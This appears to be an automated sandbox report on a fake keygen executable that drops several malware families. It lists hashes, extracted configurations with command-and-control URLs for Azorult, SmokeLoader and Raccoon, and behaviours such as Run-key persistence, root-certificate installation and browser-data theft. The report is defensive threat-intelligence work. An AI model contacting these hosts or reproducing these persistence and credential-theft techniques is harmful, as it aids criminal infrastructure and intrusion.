Analysis
-
max time kernel
34s -
max time network
603s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
04-04-2021 11:41
Static task
static1
Behavioral task
behavioral1
Sample
Comprehensive_Meta_Analysis_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Comprehensive_Meta_Analysis_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Comprehensive_Meta_Analysis_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Comprehensive_Meta_Analysis_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
Comprehensive_Meta_Analysis_keygen_by_KeygenNinja.exe
Resource
win7v20201028
General
-
Target
Comprehensive_Meta_Analysis_keygen_by_KeygenNinja.exe
-
Size
5.2MB
-
MD5
ca3728b14865976c4f39d4b1dd058d4b
-
SHA1
41f57c0b052b0ac3a276463f6c09085efb049153
-
SHA256
829a3cefee8046496eb6bc03b2009891bec987a01ebe652bacc42292cf892418
-
SHA512
eabceb4164f54c8332da402ec6f5b91776dedc1b2a4ea1491217a3fed1d4f54bde5863605cbec7910f04f4265a2a9ae8b6dd95aad0ba3dba1ec6a0a26ee217e9
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
Extracted
raccoon
9420f36ff86e78bbb8ce4073fa910f921ce2bebf
-
url4cnc
https://tttttt.me/hobamantfr1
Extracted
raccoon
afefd33a49c7cbd55d417545269920f24c85aa37
-
url4cnc
https://telete.in/jagressor_kz
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral3/memory/4944-202-0x00000000024D0000-0x0000000002DDA000-memory.dmp family_glupteba behavioral3/memory/4944-204-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral3/memory/4944-203-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
XMRig Miner Payload 8 IoCs
resource yara_rule behavioral3/memory/4692-231-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/4692-232-0x00000001402CA898-mapping.dmp xmrig behavioral3/memory/4692-235-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/4692-287-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/5896-899-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/5896-936-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/6112-1174-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/6112-1216-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Executes dropped EXE 13 IoCs
pid Process 3452 keygen-pr.exe 1856 keygen-step-1.exe 4496 keygen-step-3.exe 4580 keygen-step-4.exe 4364 Setup.exe 2128 key.exe 2680 multitimer.exe 4400 setups.exe 204 setups.tmp 212 askinstall20.exe 1620 multitimer.exe 4560 Full_Version.exe 2132 multitimer.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation AdvancedRun.exe Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation 1.exe -
Loads dropped DLL 7 IoCs
pid Process 204 setups.tmp 204 setups.tmp 204 setups.tmp 204 setups.tmp 204 setups.tmp 204 setups.tmp 204 setups.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\535xfn15di0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\PD0ECEPBIX\\multitimer.exe\" 1 3.1617536560.6069a630bf011" multitimer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA AdvancedRun.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 652 ipinfo.io 192 ipinfo.io 376 ipinfo.io 379 ipinfo.io 560 ipinfo.io 686 ipinfo.io 721 ipinfo.io 194 ipinfo.io 241 ip-api.com 412 ip-api.com -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\unins0000.dat Full_Version.exe File created C:\Program Files\unins0000.dll Full_Version.exe File created C:\Program Files\unins.vbs Full_Version.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 16 IoCs
pid pid_target Process procid_target 4164 5748 WerFault.exe 152 4420 3140 WerFault.exe 259 5284 2820 WerFault.exe 155 4464 2820 WerFault.exe 155 7200 2820 WerFault.exe 155 6580 2820 WerFault.exe 155 8060 2820 WerFault.exe 155 8216 2820 WerFault.exe 155 8924 2820 WerFault.exe 155 9168 2820 WerFault.exe 155 6532 2820 WerFault.exe 155 8584 2820 WerFault.exe 155 7872 8696 WerFault.exe 355 5096 2820 WerFault.exe 155 8932 2820 WerFault.exe 155 2744 8212 WerFault.exe 393 -
Delays execution with timeout.exe 10 IoCs
pid Process 5576 timeout.exe 4292 timeout.exe 724 timeout.exe 3920 timeout.exe 10164 timeout.exe 7748 timeout.exe 6880 timeout.exe 4080 timeout.exe 9640 timeout.exe 3092 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe -
Kills process with taskkill 10 IoCs
pid Process 3480 taskkill.exe 7580 taskkill.exe 3880 taskkill.exe 672 taskkill.exe 6024 taskkill.exe 5636 taskkill.exe 4308 taskkill.exe 6724 taskkill.exe 6864 taskkill.exe 9176 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main AdvancedRun.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" 1.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 7eb5e41c4729d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = f201311d4729d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompleted = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings AdvancedRun.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content AdvancedRun.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main AdvancedRun.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1" AdvancedRun.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate AdvancedRun.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU AdvancedRun.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 AdvancedRun.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies AdvancedRun.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache AdvancedRun.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" AdvancedRun.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" AdvancedRun.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{C10944ED-C457-4718-964B-526888779CB7}" 1.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "{777A5D92-6686-46E2-9823-0D23E72E5FCF}" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory AdvancedRun.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser MicrosoftEdge.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56